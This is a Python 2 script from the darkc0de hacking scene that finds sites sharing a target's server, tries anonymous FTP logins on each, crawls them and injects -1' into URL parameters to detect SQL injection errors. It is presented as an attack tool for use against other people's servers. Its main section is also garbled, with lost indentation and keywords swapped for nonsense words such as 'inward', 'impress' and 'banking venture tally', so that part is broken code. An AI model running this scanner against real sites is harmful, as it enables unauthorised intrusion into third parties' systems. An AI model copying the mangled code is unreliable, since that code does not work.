#!/usr/bin/python
import re, urllib, socket, ftplib
from ftplib import FTP
from HTMLParser import HTMLParser
from urllib2 import urlopen
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Greetz to all Darkc0de AH, ICW Members
#Darkc0de-d3hydra,beenu,hubysoft,Gatyi,
#Shoutz to ICW-:r45c4l,SMART_HAX0R,j4ckh4x0r,41w@r10r,micro,cyber_mafi,Hoodlum
#Gud Luck to:d4Rk 4n931
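# checkp: a small HTMLParser-based crawler. Starting from ldomain it follows
# <a href> links breadth-first for scandpth levels, keeping at most lps new
# links per page, and returns (count, url) pairs sorted by frequency.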
class checkp(HTMLParser):
    def __init__(self, ldomain, scandpth, lps):
        HTMLParser.__init__(self)
        self.url = ldomain
        self.db = {self.url: 1}
        self.node = [self.url]
        self.depth = scandpth
        self.max_span = lps
        self.links_found = 0

    def handle_starttag(self, tag, attrs):
        # Collect anchor links until the per-page span limit is reached
        if self.links_found < self.max_span and tag == 'a' and attrs:
            link = attrs[0][1]
            if link[:4] != "http":
                # Resolve relative links against the current page's host
                link = '/'.join(self.url.split('/')[:3]) + ('/' + link).replace('//', '/')
            if link not in self.db:
                print "Found Link ---> %s" % link
                self.links_found += 1
                self.node.append(link)
            self.db[link] = (self.db.get(link) or 0) + 1

    def deep(self):
        # Breadth-first crawl, one level per iteration up to self.depth
        for depth in xrange(self.depth):
            print "*"*70 + ("\nScanning depth %d web\n" % (depth + 1)) + "*"*70
            context_node = self.node[:]
            self.node = []
            for self.url in context_node:
                self.links_found = 0
                try:
                    req = urlopen(self.url)
                    res = req.read()
                    self.feed(res)
                except:
                    self.reset()
        print "*"*40 + "\nRESULTS\n" + "*"*40
        sor = [(v, k) for (k, v) in self.db.items()]
        sor.sort(reverse=True)
        return sor
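# sqlcheck: takes a crawled URL that carries GET parameters, truncates it at
# each "=" to build candidate injection points, appends -1' to each one and
# greps the response for common MySQL/MSSQL/Oracle/Jet error signatures.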
def sqlcheck(link):
    try:
        print "SQL injection checking"
        # Error signatures that indicate a possible SQL injection point
        error = "Warning"
        mysql = "mysql_fetch_array()"
        mysql2 = "mysql_fetch_array()"
        mysql3 = "You have an error in your SQL syntax"
        mssql = "Unclosed quotation mark after the character string"
        mssql2 = "Server Error in '/' Application"
        mssql3 = "Microsoft OLE DB Provider for ODBC Drivers error"
        oracle = "supplied argument is not a valid OCI8-Statement"
        jetdb = "microsoft jet database engine"
        domain = link
        sqli = []
        try:
            # Build one candidate URL per GET parameter found in the link
            if domain.count("=") >= 2:
                for x in xrange(domain.count("=")):
                    sqli.append(domain.rsplit("=", x + 1)[0] + "=")
                if domain.find("=") != -1:
                    sqli.append(domain.split("=", 1)[0] + "=")
            else:
                sqli.append(domain.split("=", 1)[0] + "=")
        except Exception, msg:
            print error
        sqli = list(set(sqli))
        print "[+] Checking :", len(sqli), "links\n"
        for slinks in sqli:
            print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
            # Append -1' to the parameter and look for database error messages
            resp = urllib.urlopen(slinks + "-1'").read(200000)
            print slinks + "-1'"
            if re.search(error, resp) != None:
                print " FOUND UNKNOWN BUG IN THIS GET REQUEST "
            if re.search(mysql, resp) != None:
                print " FOUND MYSQL BUG IN THIS GET REQUEST "
            if re.search(mysql2, resp) != None:
                print " FOUND MYSQL BUG IN THIS GET REQUEST "
            if re.search(mssql, resp) != None:
                print " FOUND MSSQL BUG IN THIS GET REQUEST "
            if re.search(mssql2, resp) != None:
                print " FOUND MSSQL BUG IN THIS GET REQUEST "
            if re.search(mssql3, resp) != None:
                print " FOUND MSSQL BUG IN THIS GET REQUEST "
            if re.search(oracle, resp) != None:
                print " FOUND ORACLE BUG IN THIS GET REQUEST "
            if re.search(jetdb, resp) != None:
                print " FOUND JET DATABASE BUG IN THIS GET REQUEST "
            if re.search(mysql3, resp) != None:
                print " FOUND MYSQL BUG IN THIS GET REQUEST "
            print '+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
    except IOError, msg:
        print 'error'
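# ftpcheck: attempts an anonymous FTP login on the given host and lists the
# root directory; any ftplib error is treated as "anonymous not possible".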
def ftpcheck(ftpdn):
    try:
        ftp = FTP(ftpdn)
        ftp.login()            # anonymous login
        ftp.retrlines('LIST')
        print "\nAnonymous login possible: Try running a make directory command"
    except ftplib.all_errors, msg:
        print "Anonymous not Possible||Or Unknown Error"
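# Main flow: resolve the target domain to an IP, query ipnear.com for other
# domains hosted on the same server, optionally probe each one for anonymous
# FTP, then crawl every domain and run sqlcheck() on links with parameters.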
print "[+]Web Server Application SQL Vulnerability Scanner Version 1.0 past times FB1H2S"
print "[+]Scans every sub domains of the given spider web site for SQL/FTP bugs"
print "[+]Report Bugs at fbone@in.com"
domain=raw_input("[+]Enter doamin adress:")
reverse=socket.gethostbyaddr(domain)
ip=str(reverse[2])
ip = ip[2:-2]
print '[+]Server ip[-]'+ip
url ='http://www.ipnear.com/results.php?s='+ip+'&submit=Lookup'
result = urllib.urlopen(url).read(200000)
linksList = re.findall('href=(.*?)>.*?',result)
print '[+]Checking anonymous FTP acess[+]'
ftpcheck(ip)
print '[+]Retrive Domains[+]'
raw_input('[+]Press Enter to Continue')
for link inward linksList:
strip = link[1:-1]
domain = strip[7:-1]
impress domain
yes=raw_input('Do u wishing to banking venture tally sudoamins for anonymous ftp: Y|continue: northward |Skip:')
if yes=='y' or yes=='Y':
for link inward linksList:
strip = link[1:-1]
domain = strip[7:-1]
impress '\nFtp::'+domain+':'
ftpcheck(domain)
elif yes=='N'or yes=='n':
impress 'Ftp banking venture tally abroted[+]'
impress 'Crwling spider web pages for SQLing[+]'
for link inward linksList:
strip = link[1:-1]
domain = strip[7:-1]
impress "Geting links of :->"+domain
try:
httpdmn='http://'+domain
# alter the scandpth value to growth the crawling depths
check1 = checkp(ldomain = httpdmn, scandpth = 3, lps = 15)
upshot = check1.deep()
for (n,link) inward result:
if link.find("=") != -1:
if link.find(httpdmn)!=-1:
impress "%s was institute %d time%s." %(link,n, "s" if n is non 1 else "")
sqlcheck(link)
except(IOError) ,msg: impress 'skiped'